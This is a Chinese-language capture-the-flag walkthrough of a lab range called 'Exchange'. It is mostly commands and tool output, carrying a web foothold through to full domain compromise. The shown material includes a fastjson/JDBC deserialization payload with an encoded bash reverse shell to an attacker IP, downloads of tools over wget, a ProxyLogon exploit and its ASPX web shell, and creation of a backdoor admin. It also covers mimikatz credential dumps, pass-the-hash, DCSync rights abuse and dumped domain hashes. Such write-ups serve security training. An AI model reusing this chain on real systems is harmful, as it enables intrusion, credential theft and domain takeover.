春秋云境 Exchange

前言

本文所使用的工具可参考以下仓库：

Awesome_Pentest_Tools: 一站式渗透测试与红队工具合集，旨在帮助渗透测试人员打造自己的工具链

靶标介绍：

Exchange 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag，分布于不同的靶机。 *注意：该靶场只有4个flag，如果提交完4个flag后仍未攻克成功，请关闭环境提交反馈。

flag1

# fscan 2.0.0
./fscan -h 39.98.109.189                          
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-08-14 22:18:20] [INFO] 暴力破解线程数: 1
[2025-08-14 22:18:20] [INFO] 开始信息扫描
[2025-08-14 22:18:20] [INFO] 最终有效主机数量: 1
[2025-08-14 22:18:20] [INFO] 开始主机扫描
[2025-08-14 22:18:20] [INFO] 有效端口数量: 233
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:21
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:22
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:80
[2025-08-14 22:18:20] [SUCCESS] 服务识别 39.98.109.189:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-08-14 22:18:20] [SUCCESS] 服务识别 39.98.109.189:21 => 
[2025-08-14 22:18:23] [SUCCESS] 端口开放 39.98.109.189:8000
[2025-08-14 22:18:26] [SUCCESS] 服务识别 39.98.109.189:80 => [http] 版本:1.10.3 产品:nginx 系统:Linux 信息:Ubuntu
[2025-08-14 22:18:33] [SUCCESS] 服务识别 39.98.109.189:8000 => [http]
[2025-08-14 22:18:33] [INFO] 存活端口数量: 4
[2025-08-14 22:18:33] [INFO] 开始漏洞扫描
[2025-08-14 22:18:33] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-08-14 22:18:33] [SUCCESS] 网站标题 http://39.98.109.189       状态码:200 长度:19813  标题:lumia
[2025-08-14 22:18:33] [SUCCESS] 网站标题 http://39.98.109.189:8000  状态码:302 长度:0      标题:无标题 重定向地址: http://39.98.109.189:8000/login.html
[2025-08-14 22:18:34] [SUCCESS] 网站标题 http://39.98.109.189:8000/login.html 状态码:200 长度:5662   标题:Lumia ERP
[2025-08-14 22:20:57] [SUCCESS] 扫描已完成: 6/6

# fscan 1.8.4
./fscan -h 39.98.109.189                          

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
39.98.109.189:21 open
39.98.109.189:80 open
39.98.109.189:22 open
39.98.109.189:8000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.98.109.189       code:200 len:19813  title:lumia
[*] WebTitle http://39.98.109.189:8000  code:302 len:0      title:None 跳转url: http://39.98.109.189:8000/login.html
[*] WebTitle http://39.98.109.189:8000/login.html code:200 len:5662   title:Lumia ERP
已完成 4/4
[*] 扫描结束,耗时: 46.288732096s

80端口是一个介绍产品的网站，8000端口应该是网站的后台

弱口令登录：

admin:123456

也可以注册一个用户

成功进入后台，进去后右上角点了一下官方插件跳转到了华夏ERP，于是去找一下华夏ERP相关的洞

华夏ERP v2.3存在一处fastjson反序列化漏洞，可以通过evil-mysql-server和ysoserial构造恶意mysql服务打jdbc：

Java 代码审计之华夏 ERP CMS v2.3 - FreeBuf网络安全行业门户

# 在vps上运行
./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

# payload
bash -i >& /dev/tcp/公网IP/54500 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx
{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "公网IP",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}
}
# 或者
{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "公网IP",
    "portToConnectTo": 3306,
    "info": {
        "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
        "password": "pass",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
}

# 可以用bp发包
GET /register.html/../user/list?search={
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "公网IP",
    "portToConnectTo": 3306,
    "info": {
        "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
        "password": "pass",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
} HTTP/1.1
Host: 39.98.109.189:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: JSESSIONID=7C6C92CE236FFAEE4E7FC06FF8EAF933
If-Modified-Since: Fri, 29 Jul 2022 07:23:14 GMT
Connection: close
# 当然也可以直接get传payload，先登录，然后hackbar传参
http://39.98.109.189:8000/register.html/../user/list?search=%7b%0a%20%20%20%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%0a%20%20%20%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%0a%20%20%20%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%34%37%2e%39%34%2e%37%34%2e%32%33%22%2c%0a%20%20%20%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%0a%20%20%20%20%22%69%6e%66%6f%22%3a%20%7b%0a%20%20%20%20%20%20%20%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%33%4e%43%34%79%4d%79%38%31%4e%44%55%77%4d%43%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%0a%20%20%20%20%20%20%20%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%0a%20%20%20%20%20%20%20%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%0a%20%20%20%20%20%20%20%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%0a%20%20%20%20%20%20%20%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%0a%20%20%20%20%7d%2c%0a%20%20%20%20%22%64%61%74%61%62%61%73%65%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%64%62%6e%61%6d%65%22%2c%0a%20%20%20%20%22%75%72%6c%22%3a%20%22%22%0a%7d

直接是root权限

cat /root/flag/flag01.txt

 ██     ██ ██     ██       ███████   ███████       ██     ████     ██   ████████ 
░░██   ██ ░██    ████     ██░░░░░██ ░██░░░░██     ████   ░██░██   ░██  ██░░░░░░██
 ░░██ ██  ░██   ██░░██   ██     ░░██░██   ░██    ██░░██  ░██░░██  ░██ ██      ░░ 
  ░░███   ░██  ██  ░░██ ░██      ░██░███████    ██  ░░██ ░██ ░░██ ░██░██         
   ██░██  ░██ ██████████░██      ░██░██░░░██   ██████████░██  ░░██░██░██    █████
  ██ ░░██ ░██░██░░░░░░██░░██     ██ ░██  ░░██ ░██░░░░░░██░██   ░░████░░██  ░░░░██
 ██   ░░██░██░██     ░██ ░░███████  ░██   ░░██░██     ░██░██    ░░███ ░░████████ 
░░     ░░ ░░ ░░      ░░   ░░░░░░░   ░░     ░░ ░░      ░░ ░░      ░░░   ░░░░░░░░  

                        |  |  ||  | /~~\  /\  |\  /|~|~
                        |  |  ||--||    |/__\ | \/ | | 
                         \/ \/ |  | \__//    \|    |_|_

flag01: flag{9df584ea-34d7-4d2b-9b71-5b746b2c6e30}

flag2

wget传马

wget http://公网IP:8000/fscan
wget http://公网IP:8000/msf/mb22
wget http://公网IP:8000/linux_x64_agent
chmod +x linux_x64_agent mb22

加权限，上线msf

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 39.98.109.189
set LPORT 54522
run

./linux_x64_agent -l 54523 -s matrix

./linux_x64_admin -c 39.98.109.189:54523 -s matrix

看看网段，fscan扫一下

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:34:e1:e1  
          inet addr:172.22.3.12  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe34:e1e1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:951314 errors:0 dropped:0 overruns:0 frame:0
          TX packets:752379 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:494361845 (494.3 MB)  TX bytes:304273385 (304.2 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:30870 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30870 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:14953460 (14.9 MB)  TX bytes:14953460 (14.9 MB)
          

./fscan -h 172.22.3.0/24
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.2:88 open
172.22.3.9:808 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.12:8000 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:8172 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo 
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetInfo 
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] OsInfo 172.22.3.2   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.26     XIAORANG\XIAORANG-PC          
[*] NetBios 172.22.3.2      [+] DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[*] NetInfo 
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] WebTitle http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle http://172.22.3.12        code:200 len:19813  title:lumia
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 9.171102981s

总结一下

(icmp) Target 172.22.3.12     已拿下
(icmp) Target 172.22.3.2      DC:XIAORANG-WIN16.xiaorang.lab，DC，Windows Server 2016 Datacenter
(icmp) Target 172.22.3.9      XIAORANG-EXC01.xiaorang.lab，Exchange 邮件服务器（EXC01），Windows Server 2016 Datacenter
(icmp) Target 172.22.3.26     XIAORANG\XIAORANG-PC，Windows Server 2016 Datacenter

• 172.22.3.2：88, 139, 445, 135
• 172.22.3.9：808, 139, 445, 443, 135, 81, 80, 8172
• 172.22.3.12：8000, 80, 22
• 172.22.3.26：135, 445, 139

Exchange Server

172.22.3.9 上面有一个Outlook Web App（exchange服务）

• Outlook一般指微软的电子邮件客户端软件（桌面应用），可以在 Windows、Mac、手机等平台使用。功能：收发邮件、日历、联系人、任务、会议等办公协作功能。
• Outlook Web Access（简称 OWA），现在更常叫 Outlook Web App，是微软 Exchange 邮件服务器的一个网页端邮箱访问界面。功能：让用户通过浏览器访问企业邮箱，收发邮件、查日程、联系人、任务等，无需安装客户端。

exprolog

猜一手邮件后缀是xiaorang.lab，admin@xiaorang.lab没打通，administrator@xiaorang.lab打通了

herwonowr/exprolog: ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

用exprolog.py 写入shell

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
 _____      ____            _             
| ____|_  _|  _ \ _ __ ___ | | ___   __ _ 
|  _| \ \/ / |_) | '__/ _ \| |/ _ \ / _` |
| |___ >  <|  __/| | | (_) | | (_) | (_| |
|_____/_/\_\_|   |_|  \___/|_|\___/ \__, |
                                    |___/ 

[#] Trying to get target FQDN
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Got target FQDN: XIAORANG-EXC01
[#] Trying to get target LegacyDN and ServerID
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Got target LegacyDN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
[+] Got target ServerID: b5ebdaa1-b4b3-4b71-ab32-7d03b4955a75
[#] Trying to get target user SID
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Got target administrator SID: S-1-5-21-533686307-2117412543-4200729784-500
[#] Trying to get target administrator cookie sessions
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Got target administrator session ID: 85342402-4794-4ac5-b523-10409dde4dee
[+] Got target administrator canary session ID: vlBxSIptCUKhHxHNUx346Iq2f4Td3N0IcbfRsJDvBOhOJslBwFY7TEoZxQU_hWE20FwAyipvZ8M.
[#] Trying to get target OABVirtualDirectory ID
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Got target AOB ID: afb15058-823b-4c37-ab8d-3012667a7d6b
[#] Trying to inject OABVirtualDirectory Shell
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Shell are injected
[#] Verifying OABVirtualDirectory Shell
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] AOB Shell verified
[+] AOB Shell payload: http:\/\/ooo\/#%3Cscript%20language=%22JScript%22%20runat=%22server%22%3Efunction%20Page_Load()%7Beval(Request%5B%22request%22%5D,%22unsafe%22);%7D%3C\/script%3E
[#] Trying to export OABVirtualDirectory Shell
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.9:443  ...  OK
[+] Shell are exported
[*] CURL Request: 
curl --request POST --url https://172.22.3.9/owa/auth/v5mts.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
[*] DONE
                                   

他这里回显里直接给payload了，按照他给的回显连马

proxychains curl --request POST --url https://172.22.3.9/owa/auth/ca3hs.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k  

proxylogon

RickGeex/ProxyLogon：ProxyLogon 是 CVE-2021-26855 的正式通用名称，该漏洞存在于 Microsoft Exchange Server 上，允许攻击者绕过认证，冒充管理员。我们还将该漏洞与另一个授权后任意写入漏洞 CVE-2021-27065 串联起来，以实现代码执行。 — RickGeex/ProxyLogon: ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.

用proxylogon可以直接命令执行

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

msf

msf也可以打：

• exploit/windows/http/exchange_proxylogon_rce：利用 ProxyLogon 漏洞进行远程代码执行（需加载最新模块库）。
• exploit/windows/http/exchange_proxyshell_rce：利用 ProxyShell 漏洞，攻击新版 Exchange。

use exploit/windows/http/exchange_proxylogon_rce
set RHOSTS 172.22.3.9
set RPORT 443    # 默认就是 Exchange Web 服务端口443，非443改成对应端口
set EMAIL administrator@xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54530
run

use exploit/windows/http/exchange_proxyshell_rce
set RHOSTS 172.22.3.9
set EMAIL administrator@xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54531
run

可以创个用户连过去

net user matrix Matrix2025! /add
net localgroup administrators matrix /add
net user matrix /domain
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

# 这里不加域，加域连不上。如果你不需要 Kerberos/域认证，可以尝试不用 /d: 参数
proxychains xfreerdp3 /u:matrix /p:Matrix2025! /d:xiaorang.lab /v:172.22.3.9 /cert:ignore 
proxychains xfreerdp3 /u:matrix /p:Matrix2025! /v:172.22.3.9 /cert:ignore 

拿flag

flag4

如果之前不用msf的话，可以现在上后门

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.3.9
set LPORT 54524
run

这里本来想信息分析一下，但是由于我们新建的用户不在域内，所以bloodhound抓不到东西

logonpasswords

mimikatz

接着传个mimikatz，抓取哈希

要用管理员打开mimikatz

log
privilege::Debug # 这条执行不成功，但是不影响
sekurlsa::logonpasswords 
exit

kiwi_cmd "sekurlsa::logonpasswords"：这是 Mimikatz 的经典命令，用于抓取当前主机所有已登录账户的明文密码、hash、票据等。

msf

可以用msf来加载

load kiwi
kiwi_cmd "privilege::debug"
kiwi_cmd "sekurlsa::logonpasswords"

抓到两个有用的hash

一个是机器用户的hash，一个是用户zhangtong

Authentication Id : 0 ; 1887841 (00000000:001cce61)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/8/15 20:20:16
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/8/15 20:18:43
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 766a276a053f370d92eaf25c243f1124
         * SHA1     : de47c096cd43e244984f43517ae52678d06318da
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xiaorang-exc01$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

可以PTH，依旧是msf或者impacket。还有更多PTH方法，参考文章：域渗透基础 - 重庆森林不在重庆

proxychains impacket-psexec xiaorang.lab/XIAORANG-EXC01\$@172.22.3.9 -hashes ':766a276a053f370d92eaf25c243f1124' -codec gbk


use exploit/windows/smb/psexec
set RHOSTS 172.22.3.9
set SMBUser XIAORANG-EXC01$
set SMBPass 00000000000000000000000000000000:766a276a053f370d92eaf25c243f1124
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54525
run

bloodhound

接下来利用system权限用bloodhound信息收集一波

运行bloodhound

sudo neo4j start

./BloodHound --no-sandbox

Sharphound

我们可以登录到 XIAORANG-EXC01 这台机器，然后用 Sharphound 工具进行权限分析。

SharpHound.exe -c all

bloodhound-python

用bloodhound-python工具收集更方便

# 安装bloodhound-python：pipx install bloodhound
proxychains4 bloodhound-python -u "XIAORANG-EXC01$" --hashes :766a276a053f370d92eaf25c243f1124 -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip

RDP

# 不知道为啥，这里上不了RDP
proxychains xfreerdp3 /u:XIAORANG-EXC01$ /pth:766a276a053f370d92eaf25c243f1124 /v:172.22.3.9 /d:xiaorang.lab /cert:ignore
proxychains xfreerdp3 /u:administrator /pth:7acbc09a6c0efd81bfa7d5a1d4238beb /v:172.22.3.9 /d:xiaorang.lab /cert:ignore

# 可能是没开启Restricted Admin Mode，需要在目标机器上（或通过组策略）开启
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

WriteDacl

分析后也可以发现，EXC01 这个机器账号默认对域里的其他成员有 WriteDACL 权限。

WriteDACL 权限允许我们修改指定对象的访问控制列表（ACL），也就是说，我们可以给别的账号“加权限”。比如，我们可以把 DCSync 权限加到 Zhangtong 这个用户身上，这样 Zhangtong 就可以用来抓取域控（域控制器）上的密码哈希了。

DCSync 是一种常用的“域渗透”技术，已经集成在 Mimikatz 工具里。在 DCSync 功能出现之前，要想获得域用户的哈希，需要登录域控制器，在域控制器上执行代码才能获得域用户的哈希。mimikatz在2015年添加了DCSync功能，由Benjamin DELPY gentilkiwi和Vincent LE TOUX共同编写，能够用来导出域内所有用户的hash。

所以，当发现 EXC01 这个机器账户有 WriteDACL 权限时，我们就可以用它来修改其他用户的权限，给 Zhangtong 加上 DCSync权限。这样 Zhangtong 就能远程抓取域控的哈希值了。

简而言之：

EXC01 可以修改域用户的权限 → 给 Zhangtong 加 DCSync 权限 → 用 Zhangtong 导出域控哈希。

PowerView

PowerView属于PowerSploit 工具集。

可以给加个DCSync或者genericall权限，这样就可以dump域控的哈希

Import-Module .\PowerView.ps1;
Add-DomainObjectAcl -TargetIdentity "DC=xiaorang,DC=lab" -PrincipalIdentity XIAORANG-EXC01$ -Rights DCSync

如果上了meterpreter的话，似乎也可以直接

load powershell
powershell_import /root/Desktop/PowerView.ps1 # 直接换成你的路径
powershell_execute "Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity 'XIAORANG-EXC01$' -Rights DCSync"

不过我没试PowerView，而是直接用的下面的工具

impacket-dacledit

impacket工具集，加上dcsync权限

# 失败，新建的用户不在域内
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124  -action write -rights DCSync -principal matrix -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

# 成功
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

接下来我们就可以利用dcsync去dump域管的hash了

impacket-psexec 命令执行
.\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

# 或者msf
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

meterpreter > kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  b8fa79a52e918cb0cbcd1c0ede492647        514
1137    HealthMailboxeda7a84    1e89e23e265bb7b54dc87938b1b1a131        66048
1138    HealthMailbox33b01cf    0eff3de35019c2ee10b68f48941ac50d        66048
1139    HealthMailbox9570292    e434c7db0f0a09de83f3d7df25ec2d2f        66048
1140    HealthMailbox3479a75    c43965ecaa92be22c918e2604e7fbea0        66048
1141    HealthMailbox2d45c5b    4822b67394d6d93980f8e681c452be21        66048
1142    HealthMailboxec2d542    147734fa059848c67553dc663782e899        66048
1143    HealthMailboxf5f7dbd    e7e4f69b43b92fb37d8e9b20848e6b66        66048
1144    HealthMailbox67dc103    4fe68d094e3e797cfc4097e5cca772eb        66048
1145    HealthMailbox320fc73    0c3d5e9fa0b8e7a830fcf5acaebe2102        66048
1146    Lumia   862976f8b23c13529c2fb1428e710296        512
500     Administrator   7acbc09a6c0efd81bfa7d5a1d4238beb        512
1000    XIAORANG-WIN16$ f4e293923315dbf505c2e33aefc92cca        532480
1147    Zhangtong       22c7f81993e96ac83ac2f3f1903de8b4        512
1103    XIAORANG-EXC01$ 766a276a053f370d92eaf25c243f1124        4096
1104    XIAORANG-PC$    57945839978ad251d75c5a8f4196472a        4096
1135    HealthMailbox8446c5b    42f51f9c4b7e0cd90f4c34fea8a202d8        66048
1136    HealthMailbox0d5918e    36f432a5d2b2754167986ee5973d003f        66048

mimikatz(powershell) # exit
Bye!

# 或者
proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.2:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
